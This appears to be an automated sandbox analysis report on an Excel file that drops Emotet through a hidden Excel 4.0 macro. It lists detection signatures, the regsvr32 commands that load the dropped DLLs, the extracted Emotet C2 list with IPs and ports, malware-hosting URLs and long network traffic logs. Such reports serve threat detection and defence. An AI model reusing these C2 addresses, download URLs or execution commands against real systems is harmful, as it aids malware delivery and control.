
Windows Analysis Report
4470_02112022.xls

Overview

General Information

Sample Name: 4470_02112022.xls
Analysis ID: 746417
MD5: d3b182de8c99553a9f2b6d0f3f030a4f
SHA1: d5bd989ffde2f67133b6404f9f234d13e618c206
SHA256: cd99b899c5a3d6ddb22969605b079375da897362b4d599fc9eebb1e21115a31d

Detection

Hidden Macro 4.0, Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Outdated Microsoft Office dropper detected
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Drops files with a non-matching file extension (content does not match file extension)
Found inlined nop instructions (likely shell or obfuscated code)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Registers a DLL
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1152 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 316 cmdline: C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1292 cmdline: C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2192 cmdline: C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2352 cmdline: C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2688 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XXKTOC\CASBb.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • regsvr32.exe (PID: 2300 cmdline: C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\XXKTOC\CASBb.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration (Emotet)

{"C2 list": ["218.38.121.17:443", "186.250.48.5:443", "80.211.107.116:8080", "174.138.33.49:7080", "165.22.254.236:8080", "185.148.169.10:8080", "62.171.178.147:8080", "128.199.217.206:443", "210.57.209.142:8080", "36.67.23.59:443", "160.16.143.191:8080", "128.199.242.164:8080", "178.238.225.252:8080", "118.98.72.86:443", "202.134.4.210:7080", "82.98.180.154:7080", "54.37.228.122:443", "64.227.55.231:8080", "195.77.239.39:8080", "103.254.12.236:7080", "103.85.95.4:8080", "178.62.112.199:8080", "83.229.80.93:8080", "114.79.130.68:443", "51.75.33.122:443", "139.196.72.155:8080", "188.165.79.151:443", "190.145.8.4:443", "196.44.98.190:8080", "198.199.70.22:8080", "103.56.149.105:8080", "104.244.79.94:443", "87.106.97.83:7080", "103.71.99.57:8080", "46.101.98.60:8080", "103.126.216.86:443", "103.224.241.74:8080", "37.44.244.177:8080", "85.214.67.203:8080", "202.28.34.99:8080", "175.126.176.79:8080", "85.25.120.45:8080", "93.104.209.107:8080", "103.41.204.169:8080", "78.47.204.80:443", "139.59.80.108:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0IMl9QmQAAIg=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW38h9QmQAAIg="]}
Source | Rule | Description | Author | Strings
00000009.00000002.1211814809.00000000002C0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000A.00000002.1213054445.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000A.00000002.1211606431.000000000017A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Emotet_3 | Yara detected Emotet | Joe Security
00000008.00000002.942096747.00000000001C0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000008.00000002.943086830.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
(3 further entries not expanded in the report)

Source | Rule | Description | Author | Strings
8.2.regsvr32.exe.1c0000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
9.2.regsvr32.exe.2c0000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
8.2.regsvr32.exe.1c0000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
10.2.regsvr32.exe.2b0000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
10.2.regsvr32.exe.2b0000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
(1 further entry not expanded in the report)

No Sigma rule has matched
Snort IDS alert
Timestamp: 11/15/22-12:44:34.987459
Source IP: 192.168.2.22
Destination IP: 218.38.121.17
Source Port: 49180
Destination Port: 443
Protocol: TCP
SID: 2404328
Classtype: A Network Trojan was detected

                      AV Detection

Source: 4470_02112022.xls | ReversingLabs: Detection: 80%
Source: 4470_02112022.xls | Virustotal: Detection: 67%
Source: 4470_02112022.xls | Metadefender: Detection: 31%
Source: 4470_02112022.xls | Avira: detected
Source: https://www.spinbalence.com/Adapter/moycMR/ | Avira URL Cloud: Label: malware
Source: https://www.spinbalence.com/index.php?controller=404 | Avira URL Cloud: Label: malware
Source: http://navylin.com/bsavxiv/axHQYKl/ | Avira URL Cloud: Label: malware
Source: https://www.3d-stickers.com/page-non-trouvee | Avira URL Cloud: Label: malware
Source: http://www.spinbalence.com/Adapter/moycMR/ | Avira URL Cloud: Label: malware
Source: http://www.3d-stickers.com/Content/Afa1PcRuxh/ | Avira URL Cloud: Label: malware
Source: www.3d-stickers.com | Virustotal: Detection: 12%
Source: www.spinbalence.com | Virustotal: Detection: 12%
Source: navylin.com | Virustotal: Detection: 13%
Source: sat7ate.com | Virustotal: Detection: 14%
Source: http://navylin.com/bsavxiv/axHQYKl/ | Virustotal: Detection: 22%
Source: https://www.3d-stickers.com/page-non-trouvee | Virustotal: Detection: 12%
Source: https://www.spinbalence.com/index.php?controller=404 | Virustotal: Detection: 10%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll | ReversingLabs: Detection: 80%
Source: C:\Users\user\oxnv4.ooccxx | ReversingLabs: Detection: 80%
Source: C:\Windows\System32\XXKTOC\CASBb.dll (copy) | ReversingLabs: Detection: 80%
Source: 0000000A.00000002.1211606431.000000000017A000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Emotet (same C2 list and public keys as the configuration shown after the process tree)
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_100061AC CryptStringToBinaryA,CryptStringToBinaryA,
Source: unknown | HTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49180 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49181 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 163.172.115.127:443 -> 192.168.2.22:49174 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 163.172.108.69:443 -> 192.168.2.22:49177 version: TLS 1.2
Source: C:\Windows\System32\regsvr32.exe | Code function: 9_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose,
Source: C:\Windows\System32\regsvr32.exe | Code function: 10_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose,

                      Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: 40hd04O0[1].dll.0.dr
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic | DNS query: name: sat7ate.com
Source: global traffic | DNS query: name: www.spinbalence.com
Source: global traffic | DNS query: name: www.3d-stickers.com
Source: global traffic | DNS query: name: navylin.com
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then lea r8, qword ptr [000000001009B410h]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then lea rdx, qword ptr [000000001009C2C4h]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then mov rax, qword ptr [rsi]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movzx eax, byte ptr [rdx]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movzx eax, byte ptr [rdx]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movzx eax, byte ptr [rcx+rdx]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movsxd rbx, qword ptr [r14+10h]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then cmp dword ptr [rsp+rax*4+28h], edi
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then cmp dword ptr [rsp+rcx*4+28h], ebx
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then mov edx, dword ptr [rsp+r8*4+28h]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then cmp rcx, r8
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then mov al, bpl
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then sub r11, 01h
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movzx eax, byte ptr [r8]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then mov r8, rdi
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movsxd rcx, qword ptr [r12+10h]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then mov rax, r8
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movzx ecx, byte ptr [r10]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then lea rbx, qword ptr [rsp+70h]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movsxd rax, rcx
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then movzx ecx, byte ptr [r10]
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then mov r8d, ebx
Source: C:\Windows\System32\regsvr32.exe | Code function: 4x nop then mov eax, r10d
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:80
Source: global traffic | TCP traffic: 163.172.115.127:80 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:80
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:80
Source: global traffic | TCP traffic: 163.172.115.127:80 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 163.172.115.127:80 -> 192.168.2.22:49173
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:80
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49174
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 163.172.115.127:443 -> 192.168.2.22:49175
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:80
Source: global traffic | TCP traffic: 163.172.108.69:80 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:80
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:80
Source: global traffic | TCP traffic: 163.172.108.69:80 -> 192.168.2.22:49176
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:80
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49177
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49178
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49178
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49178
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49178
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49178
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49178
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 163.172.108.69:443 -> 192.168.2.22:49178
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
Source: global traffic | TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
